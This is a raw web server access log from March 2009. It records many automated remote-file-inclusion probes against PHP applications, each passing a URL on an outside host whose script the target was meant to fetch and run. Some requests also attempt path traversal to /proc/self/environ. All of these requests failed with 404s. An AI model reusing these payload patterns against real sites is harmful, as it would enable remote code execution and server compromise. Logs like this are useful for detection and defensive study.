77.93.208.64 - - [10/Mar/2009:22:12:12 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:22:12:12 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:22:12:13 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:22:12:13 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
200.45.224.18 - - [10/Mar/2009:22:27:22 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
200.45.224.18 - - [10/Mar/2009:22:27:22 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
200.45.224.18 - - [10/Mar/2009:22:27:22 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
168.167.180.47 - - [10/Mar/2009:22:27:40 -0500] "GET /logs/access_log.1231545600//?_zb_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
200.45.224.18 - - [10/Mar/2009:22:28:39 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
69.65.122.96 - - [10/Mar/2009:22:33:20 -0500] "GET ///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
69.65.122.96 - - [10/Mar/2009:22:33:20 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.65.122.96 - - [10/Mar/2009:22:33:21 -0500] "GET /logs/access_log.1227657600///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.65.122.96 - - [10/Mar/2009:22:33:43 -0500] "GET /logs/access_log.1228348800///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.44.70.253 - - [10/Mar/2009:22:39:41 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
62.44.70.253 - - [10/Mar/2009:22:39:41 -0500] "GET ///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
62.44.70.253 - - [10/Mar/2009:22:39:41 -0500] "GET /logs/access_log.1227657600///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.44.70.253 - - [10/Mar/2009:22:39:58 -0500] "GET /logs/access_log.1228348800///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
208.80.195.38 - - [10/Mar/2009:22:45:47 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AT&T CSM6.0; AT&T CSM7.0; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
69.65.122.96 - - [10/Mar/2009:22:52:50 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.amen-amen.net/echadlared//flash/v6id.txt?????? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
69.65.122.96 - - [10/Mar/2009:22:52:51 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.amen-amen.net/echadlared//flash/v6id.txt?????? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
77.93.208.64 - - [10/Mar/2009:23:18:17 -0500] "GET /logs/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:23:18:17 -0500] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:23:18:29 -0500] "GET /logs/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.93.208.64 - - [10/Mar/2009:23:18:29 -0500] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
122.116.178.20 - - [10/Mar/2009:23:41:46 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vwo-campus.net/ec.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
122.116.178.20 - - [10/Mar/2009:23:41:46 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.vwo-campus.net/ec.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
69.65.122.96 - - [11/Mar/2009:00:00:46 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:00:00:46 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
66.103.131.81 - - [11/Mar/2009:00:01:48 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
66.103.131.81 - - [11/Mar/2009:00:01:48 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
66.103.131.81 - - [11/Mar/2009:00:01:49 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
66.103.131.81 - - [11/Mar/2009:00:01:49 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
66.103.131.81 - - [11/Mar/2009:00:01:50 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
66.103.131.81 - - [11/Mar/2009:00:01:50 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
66.103.131.81 - - [11/Mar/2009:00:01:50 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
66.103.131.81 - - [11/Mar/2009:00:01:50 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
66.103.131.81 - - [11/Mar/2009:00:01:52 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
66.103.131.81 - - [11/Mar/2009:00:01:52 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
66.103.131.81 - - [11/Mar/2009:00:01:55 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
66.103.131.81 - - [11/Mar/2009:00:01:55 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mingdaw.com//su3/mambots/shellid.txt????? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
65.55.230.166 - - [11/Mar/2009:00:03:28 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.166 - - [11/Mar/2009:00:03:28 -0500] "GET /logs/access_log.1140307200 HTTP/1.1" 200 689 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [11/Mar/2009:00:04:28 -0500] "GET /logs/access_log.1152576000 HTTP/1.1" 200 995 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.230.166 - - [11/Mar/2009:00:09:55 -0500] "GET /logs/access_log.1142553600 HTTP/1.1" 200 8824 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [11/Mar/2009:00:14:44 -0500] "GET /logs/access_log.1205193600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.12.13.152 - - [11/Mar/2009:00:34:52 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zphone.co.kr/technote7/data/shirohige/fxid.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
81.12.13.152 - - [11/Mar/2009:00:35:04 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zphone.co.kr/technote7/data/shirohige/fxid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
81.12.13.152 - - [11/Mar/2009:00:35:04 -0500] "GET /logs/access_log.1234828800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zphone.co.kr/technote7/data/shirohige/fxid.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
58.226.23.55 - - [11/Mar/2009:00:37:30 -0500] "GET /logs//include/lib.inc.php?site_path=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
58.226.23.55 - - [11/Mar/2009:00:37:31 -0500] "GET //include/lib.inc.php?site_path=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
58.226.23.55 - - [11/Mar/2009:00:37:31 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
58.226.23.55 - - [11/Mar/2009:00:37:52 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.76.163.60 - - [11/Mar/2009:00:38:19 -0500] "GET ///vwar/backup/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.76.163.60 - - [11/Mar/2009:00:38:19 -0500] "GET /logs///vwar/backup/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.76.163.60 - - [11/Mar/2009:00:38:19 -0500] "GET /logs/access_log.1227657600///vwar/backup/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
67.76.163.60 - - [11/Mar/2009:00:38:51 -0500] "GET /logs/access_log.1228348800///vwar/backup/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:00:39:37 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:00:39:37 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
200.201.183.18 - - [11/Mar/2009:00:42:33 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.amen-amen.net/echadlared//flash/v6id.txt?????? HTTP/1.1" 404 349 "-""libwww-perl/5.812"
200.201.183.18 - - [11/Mar/2009:00:42:34 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.amen-amen.net/echadlared//flash/v6id.txt?????? HTTP/1.1" 404 354 "-""libwww-perl/5.812"
70.38.71.140 - - [11/Mar/2009:00:45:22 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
70.38.71.140 - - [11/Mar/2009:00:45:22 -0500] "GET //include/admin.lib.inc.php?site_path=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
64.38.50.26 - - [11/Mar/2009:00:50:04 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
64.38.50.26 - - [11/Mar/2009:00:50:04 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
89.111.176.28 - - [11/Mar/2009:00:52:00 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
89.111.176.28 - - [11/Mar/2009:00:52:01 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
148.245.102.115 - - [11/Mar/2009:00:59:37 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
148.245.102.115 - - [11/Mar/2009:00:59:37 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
72.148.230.63 - - [11/Mar/2009:01:01:22 -0500] "GET /logs//vwar/admin/admin.php?vwar_root=http://www.raumanpurjehdusseura.fi/upload/fuckmefrombehind?? HTTP/1.1" 404 309 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
72.148.230.63 - - [11/Mar/2009:01:01:22 -0500] "GET //vwar/admin/admin.php?vwar_root=http://www.raumanpurjehdusseura.fi/upload/fuckmefrombehind?? HTTP/1.1" 404 304 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
72.148.230.63 - - [11/Mar/2009:01:01:22 -0500] "GET /logs/errors.php?error=http://www.raumanpurjehdusseura.fi/upload/fuckmefrombehind?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
72.148.230.63 - - [11/Mar/2009:01:01:22 -0500] "GET /errors.php?error=http://www.raumanpurjehdusseura.fi/upload/fuckmefrombehind?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
72.148.230.63 - - [11/Mar/2009:01:01:22 -0500] "GET /logs//vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 309 "-""XXXXXX"
72.148.230.63 - - [11/Mar/2009:01:01:22 -0500] "GET //vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 304 "-""XXXXXX"
72.148.230.63 - - [11/Mar/2009:01:01:22 -0500] "GET /logs//vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""XXXXXX"
72.148.230.63 - - [11/Mar/2009:01:01:22 -0500] "GET //vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""XXXXXX"
66.249.67.180 - - [11/Mar/2009:01:06:13 -0500] "GET /logs/access_log.1135641600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
219.117.223.106 - - [11/Mar/2009:01:09:56 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.0" 404 330 "-""libwww-perl/5.36"
219.117.223.106 - - [11/Mar/2009:01:09:57 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.0" 404 325 "-""libwww-perl/5.36"
212.112.227.88 - - [11/Mar/2009:01:15:42 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
212.112.227.88 - - [11/Mar/2009:01:15:42 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
65.55.230.166 - - [11/Mar/2009:01:20:02 -0500] "GET /logs/access_log.1206835200 HTTP/1.1" 200 823 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
81.169.143.242 - - [11/Mar/2009:01:40:27 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 309 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
81.169.143.242 - - [11/Mar/2009:01:40:27 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 314 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
81.169.143.242 - - [11/Mar/2009:01:40:43 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://kazandoska.ru/idoisir.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.69"
81.169.143.242 - - [11/Mar/2009:01:40:43 -0500] "GET //include/admin.lib.inc.php?site_path=http://kazandoska.ru/idoisir.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.69"
69.65.122.96 - - [11/Mar/2009:01:44:40 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:01:44:40 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
61.220.16.179 - - [11/Mar/2009:01:54:54 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
61.220.16.179 - - [11/Mar/2009:01:54:55 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
77.221.130.17 - - [11/Mar/2009:02:07:53 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
77.221.130.17 - - [11/Mar/2009:02:07:53 -0500] "GET //include/bbs.lib.inc.php?site_path=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
200.201.183.18 - - [11/Mar/2009:02:14:18 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.amen-amen.net/echadlared//flash/v6id.txt?????? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
200.201.183.18 - - [11/Mar/2009:02:14:18 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.amen-amen.net/echadlared//flash/v6id.txt?????? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
58.226.23.55 - - [11/Mar/2009:02:16:36 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
58.226.23.55 - - [11/Mar/2009:02:16:36 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
58.226.23.55 - - [11/Mar/2009:02:16:36 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
212.112.227.88 - - [11/Mar/2009:02:17:53 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
212.112.227.88 - - [11/Mar/2009:02:17:54 -0500] "GET //include/lib.inc.php?site_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
201.72.166.52 - - [11/Mar/2009:02:19:35 -0500] "GET /logs/errors.php?error=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
201.72.166.52 - - [11/Mar/2009:02:19:36 -0500] "GET /errors.php?error=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
69.65.122.96 - - [11/Mar/2009:02:19:40 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:02:19:40 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:02:19:40 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
219.117.223.106 - - [11/Mar/2009:02:19:49 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.0" 404 296 "-""libwww-perl/5.36"
219.117.223.106 - - [11/Mar/2009:02:19:50 -0500] "GET //include/lib.inc.php?site_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.0" 404 291 "-""libwww-perl/5.36"
69.65.122.96 - - [11/Mar/2009:02:19:54 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:02:19:55 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:02:19:55 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:02:21:51 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:02:21:51 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:02:21:52 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
195.35.82.155 - - [11/Mar/2009:02:37:32 -0500] "GET //include/footer.php?_path[counter]=http://annualkellyfamilyreunion.com/forum//jpg/yes.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
195.35.82.155 - - [11/Mar/2009:02:37:32 -0500] "GET /logs//include/footer.php?_path[counter]=http://annualkellyfamilyreunion.com/forum//jpg/yes.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
61.62.162.42 - - [11/Mar/2009:02:38:44 -0500] "GET /logs//include/footer.php?_path[counter]=http://annualkellyfamilyreunion.com/forum//jpg/yes.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
61.62.162.42 - - [11/Mar/2009:02:38:44 -0500] "GET //include/footer.php?_path[counter]=http://annualkellyfamilyreunion.com/forum//jpg/yes.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
61.220.16.179 - - [11/Mar/2009:02:44:48 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
61.220.16.179 - - [11/Mar/2009:02:44:49 -0500] "GET //include/lib.inc.php?site_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
65.55.230.166 - - [11/Mar/2009:02:54:01 -0500] "GET /logs/access_log.1160265600 HTTP/1.1" 304 - "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
85.119.154.60 - - [11/Mar/2009:02:56:44 -0500] "GET /logs//bbshop/admin/admin.php?_shop_path=http://hredu.net/bbs/skin/zero_vote/images/idoke.txt???? HTTP/1.0" 404 299 "-""libwww-perl/5.48"
85.119.154.60 - - [11/Mar/2009:02:56:44 -0500] "GET //bbshop/admin/admin.php?_shop_path=http://hredu.net/bbs/skin/zero_vote/images/idoke.txt???? HTTP/1.0" 404 294 "-""libwww-perl/5.48"
195.35.82.155 - - [11/Mar/2009:03:04:15 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://internetpc.co.kr/gnr_session/yes.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
195.35.82.155 - - [11/Mar/2009:03:04:15 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://internetpc.co.kr/gnr_session/yes.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
87.249.116.188 - - [11/Mar/2009:03:06:07 -0500] "GET //admin/admin.php?_shop_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.249.116.188 - - [11/Mar/2009:03:06:07 -0500] "GET /logs//admin/admin.php?_shop_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
87.249.116.188 - - [11/Mar/2009:03:06:07 -0500] "GET /logs/access_log.1232755200//admin/admin.php?_shop_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
87.249.116.188 - - [11/Mar/2009:03:06:21 -0500] "GET /logs/access_log.1230681600//admin/admin.php?_shop_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
